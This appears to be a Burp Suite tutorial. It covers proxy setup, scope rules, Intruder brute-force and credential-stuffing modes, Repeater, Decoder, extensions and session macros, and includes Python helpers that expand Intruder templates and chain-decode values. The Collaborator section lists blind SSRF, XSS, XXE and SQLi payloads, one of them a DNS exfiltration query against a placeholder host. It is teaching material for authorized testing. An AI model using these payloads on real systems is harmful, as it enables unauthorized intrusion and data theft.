Conquering BurpSuite

Task 1
BurpSuite Mastery

1. Burp Suite Overview

Burp Suite is the industry-standard web application security testing tool. It operates as an intercepting proxy between the browser and the target application.

Architecture

Browser --> Burp Proxy (127.0.0.1:8080) --> Target Web Application
                |
                +-- Proxy (intercept/modify requests)
                +-- Target (scope definition)
                +-- Intruder (automated attacks)
                +-- Repeater (manual request manipulation)
                +-- Scanner (automated vulnerability detection) [Pro]
                +-- Decoder (encoding/decoding)
                +-- Comparer (diff responses)
                +-- Sequencer (entropy analysis)
                +-- Collaborator (out-of-band testing) [Pro]
                +-- Extensions (BApps)

2. Proxy Configuration

2.1 Browser Setup

# Firefox Manual Proxy Configuration
HTTP Proxy: 127.0.0.1   Port: 8080
SSL Proxy:  127.0.0.1   Port: 8080
Check: "Use this proxy for all protocols"

# Exclude from proxy
localhost, 127.0.0.1

2.2 CA Certificate

  1. With proxy enabled, browse to http://burpsuite
  2. Click "CA Certificate" to download
  3. Firefox: Preferences → Privacy & Security → Certificates → Import
  4. Chrome: Settings → Security → Manage Certificates → Import

2.3 Mobile Proxy Setup

# Android
Settings → Wi-Fi → Long press network → Modify → Advanced → Proxy: Manual
Proxy hostname: YOUR_BURP_IP
Proxy port: 8080
# Install CA cert: Settings → Security → Install from storage

# iOS
Settings → Wi-Fi → (i) icon → HTTP Proxy → Manual
Server: YOUR_BURP_IP
Port: 8080
# Install CA cert: Browse to http://burpsuite on device

3. Target Scope Configuration

Setting proper scope prevents testing out-of-scope targets:

Target → Scope → Add:
  Protocol: Any
  Host or IP: target.com
  Port: Any
  File: ^/.*

# Include subdomains
  Host: .*\.target\.com$

# Exclude specific paths
  Protocol: Any
  Host: target.com
  File: ^/logout$

Proxy → Options → Intercept Client Requests → Enable "And URL is in target scope"


4. Intruder Attack Types

4.1 Sniper

Single payload set, inserted one position at a time.

POST /login HTTP/1.1
username=§admin§&password=§password§

Payload set 1: [admin, root, test, user]

Iteration 1: username=admin&password=password
Iteration 2: username=root&password=password
Iteration 3: username=test&password=password
Iteration 4: username=user&password=password
Iteration 5: username=admin&password=admin
Iteration 6: username=admin&password=root
...

Use case: Testing one parameter at a time (fuzzing, enumeration)

4.2 Battering Ram

Single payload set, same value in all positions simultaneously.

POST /login HTTP/1.1
username=§payload§&password=§payload§

Payload: [admin, test, root]

Iteration 1: username=admin&password=admin
Iteration 2: username=test&password=test
Iteration 3: username=root&password=root

Use case: When same value goes in multiple places

4.3 Pitchfork

Multiple payload sets, one per position, iterated in parallel.

POST /login HTTP/1.1
username=§pos1§&password=§pos2§

Set 1: [admin, user1, user2]
Set 2: [admin123, pass1, pass2]

Iteration 1: username=admin&password=admin123
Iteration 2: username=user1&password=pass1
Iteration 3: username=user2&password=pass2

Use case: Credential stuffing with known username/password pairs

4.4 Cluster Bomb

Multiple payload sets, all combinations tested.

POST /login HTTP/1.1
username=§pos1§&password=§pos2§

Set 1: [admin, user1]
Set 2: [pass1, pass2, pass3]

Iteration 1: username=admin&password=pass1
Iteration 2: username=admin&password=pass2
Iteration 3: username=admin&password=pass3
Iteration 4: username=user1&password=pass1
Iteration 5: username=user1&password=pass2
Iteration 6: username=user1&password=pass3

Use case: Brute forcing when username and password are unknown
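
The four attack types in 4.1 to 4.4, as an added Python example that is not Burp's own code: it expands a request template carrying § markers exactly the way Intruder does for each mode, so the iteration lists above can be regenerated and the request count of each mode (the volume a lockout or rate-limit control has to absorb) compared before anything is sent.

```python
import itertools
import re
from typing import List

# Added example (not Burp's code): expands a template with § payload markers
# under each Intruder attack type. Text between a § pair is the base value.
MARKER = re.compile("§([^§]*)§")

def parse_template(template: str):
    """Return (literal chunks, base values) for a template with § markers."""
    parts = MARKER.split(template)   # literal, value, literal, value, ..., literal
    return parts[0::2], parts[1::2]

def render(literals: List[str], values: List[str]) -> str:
    """Re-assemble the request with the chosen value at every position."""
    out = [literals[0]]
    for value, literal in zip(values, literals[1:]):
        out += [value, literal]
    return "".join(out)

def sniper(template: str, payloads: List[str]) -> List[str]:
    """One position at a time; the other positions keep their base value."""
    literals, base = parse_template(template)
    requests = []
    for i in range(len(base)):
        for p in payloads:
            values = list(base)
            values[i] = p
            requests.append(render(literals, values))
    return requests

def battering_ram(template: str, payloads: List[str]) -> List[str]:
    """Same payload placed into every position at once."""
    literals, base = parse_template(template)
    return [render(literals, [p] * len(base)) for p in payloads]

def pitchfork(template: str, payload_sets: List[List[str]]) -> List[str]:
    """One set per position, walked in parallel (stops at the shortest set)."""
    literals, _ = parse_template(template)
    return [render(literals, list(combo)) for combo in zip(*payload_sets)]

def cluster_bomb(template: str, payload_sets: List[List[str]]) -> List[str]:
    """Every combination of the sets; the last position varies fastest."""
    literals, _ = parse_template(template)
    return [render(literals, list(combo)) for combo in itertools.product(*payload_sets)]

if __name__ == "__main__":
    tmpl = "username=§admin§&password=§password§"
    print(len(sniper(tmpl, ["admin", "root", "test", "user"])), "sniper requests")
```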

4.5 Grep Match for Results Analysis

Intruder → Options → Grep - Match:
  Add: "Invalid credentials"
  Add: "Login successful"
  Add: "Welcome"
  Add: "dashboard"

# Filter results by response length, status code, or grep match
# Different response length often indicates successful login

5. Repeater

Manual request manipulation tool for precision testing:

# Right-click any request → Send to Repeater
# Or Ctrl+R

# Use cases:
# 1. SQLi testing - modify parameters and observe responses
# 2. XSS payload testing - try different payloads
# 3. Authentication bypass - manipulate tokens/cookies
# 4. API testing - change methods, headers, body
# 5. IDOR testing - change IDs and compare responses

# Tips:
# - Use Ctrl+Space for auto-complete
# - Right-click → Change request method (GET↔POST)
# - Use tabs to test multiple variations
# - Inspector panel for easy parameter editing

6. Decoder

# Encoding operations:
# URL encoding: admin → %61%64%6d%69%6e
# HTML encoding: <script> → &lt;script&gt;
# Base64: admin:password → YWRtaW46cGFzc3dvcmQ=
# Hex: admin → 61646d696e
# ASCII hex: A → 41
# Gzip/deflate compression

# Decoding chain example:
# Input: JTNDc2NyaXB0JTNFYWxlcnQoMSklM0MlMkZzY3JpcHQlM0U=
# Step 1: Base64 decode → %3Cscript%3Ealert(1)%3C%2Fscript%3E
# Step 2: URL decode → <script>alert(1)</script>

# Smart Decode: automatically identifies and decodes
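
The decoding chain above, as an added Python example that is not Burp's code: a small Smart Decode-style loop that tries Base64, URL and HTML decoding in turn and repeats until the value stops changing, recording each step so the chain can be read back.

```python
import base64
import binascii
import html
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Added example (not Burp's code): tries each decoder, keeps the first one that
# changes the value, and repeats until none applies, so the two-step chain
# above comes out as [("base64", ...), ("url", ...)].
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def try_base64(s: str) -> Optional[str]:
    # Demand canonical length/alphabet and printable UTF-8 output so that
    # ordinary words which happen to be valid Base64 are not "decoded".
    if len(s) % 4 != 0 or not B64_RE.match(s):
        return None
    try:
        out = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return out if all(c.isprintable() or c in "\r\n\t" for c in out) else None

def try_url(s: str) -> Optional[str]:
    out = unquote(s)
    return out if out != s else None

def try_html(s: str) -> Optional[str]:
    out = html.unescape(s)
    return out if out != s else None

DECODERS = [("base64", try_base64), ("url", try_url), ("html", try_html)]

def smart_decode(value: str, max_steps: int = 10) -> List[Tuple[str, str]]:
    """Return the (encoding, result) steps applied until the value is stable."""
    steps, current = [], value
    for _ in range(max_steps):
        for name, decoder in DECODERS:
            out = decoder(current)
            if out is not None:
                steps.append((name, out))
                current = out
                break
        else:
            break                     # no decoder changed the value: done
    return steps

if __name__ == "__main__":
    for name, result in smart_decode("JTNDc2NyaXB0JTNFYWxlcnQoMSklM0MlMkZzY3JpcHQlM0U="):
        print(f"{name:>6} -> {result}")
```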

7. Comparer

# Compare two responses to find differences
# Use cases:
# - Different user roles accessing same endpoint
# - Before/after parameter modification
# - Identifying subtle differences in login responses (user enumeration)

# Right-click response → Send to Comparer
# Compare by words or bytes
# Highlights additions, modifications, deletions

8. Sequencer

# Analyze randomness of session tokens
# Steps:
# 1. Capture a request that sets a session token
# 2. Right-click → Send to Sequencer
# 3. Configure the token location (cookie, parameter)
# 4. Start live capture (collect 10,000+ tokens)
# 5. Analyze results

# Results analysis:
# - Overall quality: Excellent (>112 bits), Reasonable (>56 bits), Poor (<56 bits)
# - Bit-level analysis shows entropy per position
# - Character-level analysis shows distribution
# - Identifies predictable patterns

9. Essential Burp Extensions

Extension                        Purpose
-------------------------------  ----------------------------------------------------
Autorize                         Automated authorization testing (IDOR, privilege esc)
Active Scan++                    Enhanced active scanning capabilities
Param Miner                      Discover hidden parameters and headers
Logger++                         Advanced HTTP logging and filtering
Turbo Intruder                   High-speed request sending for race conditions
JSON Beautifier                  Format JSON in requests/responses
Retire.js                        Identify vulnerable JavaScript libraries
Hackvertor                       Tag-based encoding/decoding in requests
InQL                             GraphQL introspection and testing
JWT Editor                       JWT token manipulation and attacks
Collaborator Everywhere          Inject Collaborator payloads everywhere
SAML Raider                      SAML assertion manipulation
HTTP Request Smuggler            Detect request smuggling vulnerabilities
Freddy                           Deserialization vulnerability detection
Software Vulnerability Scanner   Detect known CVEs

Installation: Extender → BApp Store → Search and Install


10. Session Handling Rules and Macros

Macros

# Use macros to automate multi-step actions:
# 1. Project Options → Sessions → Macros → Add
# 2. Record the sequence (e.g., login flow)
# 3. Configure parameter extraction from responses

# Example: Auto-login macro
# Step 1: GET /login (extract CSRF token)
# Step 2: POST /login (send credentials + CSRF token)
# Step 3: Extract session cookie from response

Session Handling Rules

# Project Options → Sessions → Session Handling Rules → Add
# Rule actions:
# - Run macro (re-authenticate if session expires)
# - Check session validity
# - Update current request parameters
# - Use cookies from Burp's cookie jar

# Scope: Define which tools/URLs use this rule

11. Match and Replace Rules

# Proxy → Options → Match and Replace

# Useful rules:
# 1. Remove security headers for testing:
#    Match: X-Frame-Options:.*
#    Replace: (empty)
#    Type: Response header

# 2. Add custom headers:
#    Match: (empty)
#    Replace: X-Forwarded-For: 127.0.0.1
#    Type: Request header

# 3. Modify User-Agent:
#    Match: User-Agent:.*
#    Replace: User-Agent: Googlebot/2.1
#    Type: Request header

# 4. Change response for testing:
#    Match: "isAdmin":false
#    Replace: "isAdmin":true
#    Type: Response body

12. Collaborator (Pro)

# Burp Collaborator provides an external server for out-of-band testing
# Burp → Collaborator → Copy to clipboard

# Use cases:
# - Blind SSRF: fetch http://COLLABORATOR_URL
# - Blind XSS: <img src=http://COLLABORATOR_URL>
# - Blind XXE: <!ENTITY xxe SYSTEM "http://COLLABORATOR_URL">
# - Blind SQLi: LOAD_FILE('\\\\COLLABORATOR_URL\\a')
# - DNS-based exfiltration: SELECT load_file(concat('\\\\',version(),'.COLLABORATOR_URL\\a'))

# Poll for interactions:
# Collaborator tab → Poll now
# Shows DNS lookups, HTTP requests, SMTP interactions

13. Tips and Tricks

# Keyboard shortcuts:
# Ctrl+R: Send to Repeater
# Ctrl+I: Send to Intruder
# Ctrl+U: URL encode selection
# Ctrl+Shift+U: URL decode selection
# Ctrl+B: Base64 encode
# Ctrl+Shift+B: Base64 decode

# Performance:
# - Disable Intruder throttling for speed (but be careful)
# - Use resource pool for concurrent requests
# - Reduce maximum memory in startup for stability

# Organization:
# - Use target scope strictly
# - Add comments to interesting requests
# - Highlight requests with colors
# - Use project files to save progress
# - Export specific items for reporting

# Bambda filters (Proxy history):
# Note: history entries that never received a response have a null response(),
# so check hasResponse() before touching it or the filter throws.
# return requestResponse.request().hasParameter("token", HttpParameterType.URL);
# return requestResponse.hasResponse() && requestResponse.response().statusCode() == 403;
# return requestResponse.request().path().contains("/api/");